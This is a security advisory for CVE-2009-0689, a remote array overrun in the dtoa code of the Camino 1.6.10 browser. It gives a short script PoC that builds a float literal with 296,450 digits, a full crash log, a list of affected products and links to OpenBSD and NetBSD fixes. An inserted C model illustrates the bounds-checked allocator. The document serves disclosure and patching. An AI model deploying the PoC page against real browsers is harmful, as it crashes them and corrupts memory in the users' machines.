Camino 1.6.10 Remote Array Overrun

Date: 12 Dec 2009 00:00:00
Reported by: Maksymilian Arciemowicz
Type: packetstorm
Source: packetstormsecurity.com

Camino 1.6.10 Remote Array Overrun causing Arbitrary code execution

`[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]  
  
Author: Maksymilian Arciemowicz and sp3x  
http://SecurityReason.com  
Date:  
- Dis.: 07.05.2009  
- Pub.: 11.12.2009  
  
CVE: CVE-2009-0689  
CWE: CWE-119  
Risk: High  
Remote: Yes  
  
Affected Software:  
- Camino 1.6.10  
  
Fixed in:  
- Camino 2.0 and later  
  
NOTE: Prior versions may also be affected.  
  
Original URL:  
http://securityreason.com/achievement_securityalert/76  
  
  
--- 0.Description ---  
Camino (from the Spanish word camino meaning "way", "path" or "road") is  
a free, open source, GUI-based Web browser based on Mozilla's Gecko  
layout engine and specifically designed for the Mac OS X operating  
system. In place of an XUL-based user interface used by most  
Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although  
it does not use native text boxes.  
  
--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---  
The main problem exists in the dtoa implementation. Camino ships the same dtoa  
as Firefox, SeaMonkey, Chrome, Opera etc., and the flaw is the same one  
described in SREASONRES:20090625.  
  
http://securityreason.com/achievement_securityalert/63  
  
However, the fix for SREASONRES:20090625 used by OpenBSD was not sufficient.  
More information about the OpenBSD fix and similar ones is in SREASONRES:20091030,  
  
http://securityreason.com/achievement_securityalert/69  
  
A floating-point literal with enough digits makes dtoa overwrite memory. Kmax  
is defined as 15, but the dtoa functions do not check the Kmax limit, so the  
freelist array can be indexed at element 16 or beyond, past its end.  
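How the digit count of a literal drives dtoa's freelist index k past Kmax, and what the checked allocation path looks like, as a constructed C model added here (not Mozilla's, Camino's or David Gay's code; the names Kmax, freelist, Balloc, Bfree and s2b are borrowed from dtoa.c, everything else is assumed):

```c
/* Constructed model of the sizing logic in dtoa.c (added here; not Mozilla's or
 * David Gay's code). Kmax, freelist, Balloc, Bfree and s2b mirror dtoa.c names.
 * The bug: s2b() derives index k from the digit count, and the unfixed Balloc()
 * used freelist[k] without checking k <= Kmax. */
#include <stdlib.h>
#define Kmax 15  /* freelist has Kmax + 1 slots, k = 0 .. 15 */
typedef struct Bigint {
    struct Bigint *next;
    int k, maxwds;
    unsigned int x[1];  /* maxwds 32-bit words follow */
} Bigint;
static Bigint *freelist[Kmax + 1];

/* Same loop as s2b(): 9 decimal digits per 32-bit word, rounded up to 2^k words. */
int s2b_k_for_digits(int nd) {
    int x = (nd + 8) / 9, k, y;
    for (k = 0, y = 1; x > y; y <<= 1, k++) ;
    return k;
}

/* Fixed Balloc(): k > Kmax bypasses the freelist and goes straight to malloc. */
Bigint *Balloc_checked(int k) {
    Bigint *rv;
    int words = 1 << k;
    if (k <= Kmax && (rv = freelist[k]) != NULL) {
        freelist[k] = rv->next;
        return rv;
    }
    rv = malloc(sizeof(Bigint) + (words - 1) * sizeof(unsigned int));
    if (rv == NULL) return NULL;
    rv->k = k;
    rv->maxwds = words;
    return rv;
}

/* Fixed Bfree(): a block with k > Kmax never goes back on the (too short) freelist. */
void Bfree_checked(Bigint *v) {
    if (v == NULL) return;
    if (v->k > Kmax) { free(v); return; }
    v->next = freelist[v->k];
    freelist[v->k] = v;
}

/* Words allocated for an nd-digit literal; 294913 digits is the first nd with k = 16. */
int alloc_words_for_digits(int nd) {
    Bigint *b = Balloc_checked(s2b_k_for_digits(nd));
    int w = b ? b->maxwds : -1;
    Bfree_checked(b);
    return w;
}
```

With the 296450 digits used in the PoC, s2b's loop yields k = 16, one past the last freelist slot, which is the out-of-bounds index the advisory describes.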
  
  
--- 2. Proof of Concept (PoC) ---  
-----------------------  
<script>  
var a=0.<?php echo str_repeat("1",296450); ?>;  
</script>  
-----------------------  
  
Process: Camino [153]  
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino  
Identifier: org.mozilla.camino  
Version: 1.6.10 (1609.09.25)  
Code Type: X86 (Native)  
Parent Process: launchd [92]  
  
Date/Time: 2009-11-06 12:57:24.698 -0800  
OS Version: Mac OS X 10.5.6 (9G55)  
Report Version: 6  
  
Exception Type: EXC_BAD_ACCESS (SIGSEGV)  
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590  
Crashed Thread: 0  
  
Thread 0 Crashed:  
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list  
+ 235  
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180  
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81  
3 libSystem.B.dylib 0x01d76fac malloc + 55  
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220  
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282  
6 org.mozilla.camino 0x0038ae0e  
nsCSSRuleProcessor::GetRuleCascade(nsPresContext*) + 146  
7 org.mozilla.camino 0x0038b215  
nsCSSRuleProcessor::RulesMatching(PseudoRuleProcessorData*) + 27  
8 org.mozilla.camino 0x003afbd0  
EnumPseudoRulesMatching(nsIStyleRuleProcessor*, void*) + 24  
9 org.mozilla.camino 0x003b0885 nsStyleSet::FileRules(int  
(*)(nsIStyleRuleProcessor*, void*), RuleProcessorData*) + 37  
10 org.mozilla.camino 0x003b0c77  
nsStyleSet::ResolvePseudoStyleFor(nsIContent*, nsIAtom*,  
nsStyleContext*, nsICSSPseudoComparator*) + 123  
11 org.mozilla.camino 0x002cc924  
nsCSSFrameConstructor::ConstructRootFrame(nsIContent*, nsIFrame**) + 134  
12 org.mozilla.camino 0x002f617b  
PresShell::InitialReflow(int, int) + 1151  
13 org.mozilla.camino 0x005a90d4  
nsContentSink::StartLayout(int) + 342  
14 org.mozilla.camino 0x00483354  
HTMLContentSink::StartLayout() + 82  
15 org.mozilla.camino 0x00486cb7  
HTMLContentSink::OpenBody(nsIParserNode const&) + 193  
16 org.mozilla.camino 0x001a60e8  
CNavDTD::OpenBody(nsCParserNode const*) + 54  
17 org.mozilla.camino 0x001a8b53  
CNavDTD::HandleDefaultStartToken(CToken*, nsHTMLTag, nsCParserNode*) + 393  
18 org.mozilla.camino 0x001aa3e5  
CNavDTD::HandleStartToken(CToken*) + 623  
19 org.mozilla.camino 0x001aaaa2  
CNavDTD::HandleToken(CToken*, nsIParser*) + 1358  
20 org.mozilla.camino 0x001a9a4d  
CNavDTD::BuildModel(nsIParser*, nsITokenizer*, nsITokenObserver*,  
nsIContentSink*) + 165  
21 org.mozilla.camino 0x001a94ee  
CNavDTD::DidBuildModel(unsigned int, int, nsIParser*, nsIContentSink*) + 550  
22 org.mozilla.camino 0x001b5e28  
nsParser::DidBuildModel(unsigned int) + 90  
23 org.mozilla.camino 0x001b83c7 nsParser::ResumeParse(int,  
int, int) + 661  
24 org.mozilla.camino 0x001b59a8  
nsParser::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 128  
25 org.mozilla.camino 0x002076a0  
nsDocumentOpenInfo::OnStopRequest(nsIRequest*, nsISupports*, unsigned  
int) + 88  
26 org.mozilla.camino 0x000f522a  
nsFileChannel::OnStopRequest(nsIRequest*, nsISupports*, unsigned int) + 78  
27 org.mozilla.camino 0x000baf18  
nsInputStreamPump::OnStateStop() + 88  
28 org.mozilla.camino 0x000bb49d  
nsInputStreamPump::OnInputStreamReady(nsIAsyncInputStream*) + 133  
29 libxpcom_core.dylib 0x00cb7d4d nsAStreamCopier::Process()  
+ 751  
30 libxpcom_core.dylib 0x00c8f251 PL_HandleEvent + 21  
31 libxpcom_core.dylib 0x00c8f50a PL_ProcessPendingEvents + 103  
32 com.apple.CoreFoundation 0x014455f5 CFRunLoopRunSpecific + 3141  
33 com.apple.CoreFoundation 0x01445cd8 CFRunLoopRunInMode + 88  
34 com.apple.HIToolbox 0x02d8b2c0 RunCurrentEventLoopInMode  
+ 283  
35 com.apple.HIToolbox 0x02d8b0d9 ReceiveNextEventCommon + 374  
36 com.apple.HIToolbox 0x02d8af4d  
BlockUntilNextEventMatchingListInMode + 106  
37 com.apple.AppKit 0x05e94d7d _DPSNextEvent + 657  
38 com.apple.AppKit 0x05e94630 -[NSApplication  
nextEventMatchingMask:untilDate:inMode:dequeue:] + 128  
39 com.apple.AppKit 0x05e8d66b -[NSApplication run] + 795  
40 com.apple.AppKit 0x05e5a8a4 NSApplicationMain + 574  
41 org.mozilla.camino 0x0000364c main + 196  
42 org.mozilla.camino 0x00002f1e _start + 216  
43 org.mozilla.camino 0x00002e45 start + 41  
  
Thread 1:  
0 libSystem.B.dylib 0x01dad30a  
select$DARWIN_EXTSN$NOCANCEL + 10  
1 libnspr4.dylib 0x00d3940e poll + 258  
2 libnspr4.dylib 0x00d35cc6 PR_Poll + 134  
3 org.mozilla.camino 0x000cb897  
nsSocketTransportService::Poll(unsigned int*) + 99  
4 org.mozilla.camino 0x000cbe75  
nsSocketTransportService::Run() + 497  
5 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 2:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 libxpcom_core.dylib 0x00c93be2 TimerThread::Run() + 74  
6 libxpcom_core.dylib 0x00c91baf nsThread::Main(void*) + 41  
7 libnspr4.dylib 0x00d37309 _pt_root + 150  
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
9 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 3:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000b539d  
nsIOThreadPool::ThreadFunc(void*) + 145  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 4:  
0 libSystem.B.dylib 0x01d7d3ae __semwait_signal + 10  
1 libSystem.B.dylib 0x01da7d0d pthread_cond_wait$UNIX2003  
+ 73  
2 com.apple.QuartzCore 0x052c6ab9 fe_fragment_thread + 54  
3 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
4 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 5:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000d43ce  
nsHostResolver::GetHostToLookup(nsHostRecord**) + 212  
6 org.mozilla.camino 0x000d4b2d  
nsHostResolver::ThreadFunc(void*) + 123  
7 libnspr4.dylib 0x00d37309 _pt_root + 150  
8 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
9 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 6:  
0 libSystem.B.dylib 0x01dc56f2 select$DARWIN_EXTSN + 10  
1 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
2 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 7:  
0 libSystem.B.dylib 0x01d76226  
semaphore_timedwait_signal_trap + 10  
1 libSystem.B.dylib 0x01da81ef _pthread_cond_wait + 1244  
2 libSystem.B.dylib 0x01df2aaf pthread_cond_timedwait + 47  
3 libnspr4.dylib 0x00d32970 pt_TimedWait + 207  
4 libnspr4.dylib 0x00d32cc7 PR_WaitCondVar + 75  
5 org.mozilla.camino 0x000b539d  
nsIOThreadPool::ThreadFunc(void*) + 145  
6 libnspr4.dylib 0x00d37309 _pt_root + 150  
7 libSystem.B.dylib 0x01da7095 _pthread_start + 321  
8 libSystem.B.dylib 0x01da6f52 thread_start + 34  
  
Thread 0 crashed with X86 Thread State (32-bit):  
eax: 0xf8051a22 ebx: 0x01d7e255 ecx: 0x07e8fca0 edx: 0x7e33d590  
edi: 0x07d5c000 esi: 0x07e00000 ebp: 0xbfffe208 esp: 0xbfffe190  
ss: 0x0000001f efl: 0x00010206 eip: 0x01d7e325 cs: 0x00000017  
ds: 0x0000001f es: 0x0000001f fs: 0x00000000 gs: 0x00000037  
cr2: 0x7e33d590  
  
--- 3. SecurityReason Note ---  
Officially SREASONRES:20090625 has been detected in:  
- OpenBSD  
- NetBSD  
- FreeBSD  
- MacOSX  
- Google Chrome  
- Mozilla Firefox  
- Mozilla Seamonkey  
- Mozilla Thunderbird  
- Mozilla Sunbird  
- Mozilla Camino  
- KDE (example: konqueror)  
- Opera  
- K-Meleon  
- F-Lock  
  
This list is not yet closed.  
  
--- 4. Fix ---  
NetBSD fix (optimal):  
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h  
  
OpenBSD fix:  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c  
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c  
  
  
--- 5. Credits ---  
Discovered by sp3x and Maksymilian Arciemowicz from SecurityReason.com.  
  
  
--- 6. Greets ---  
Infospec p_e_a pi3  
  
  
--- 7. Contact ---  
Email:  
- cxib {a.t] securityreason [d0t} com  
- sp3x {a.t] securityreason [d0t} com  
  
GPG:  
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg  
- http://securityreason.com/key/sp3x.gpg  
  
http://securityreason.com/  
http://securityreason.pl/  
  
  
`

Vulners AI Score: 0.3 (Low risk)
EPSS: 0.4176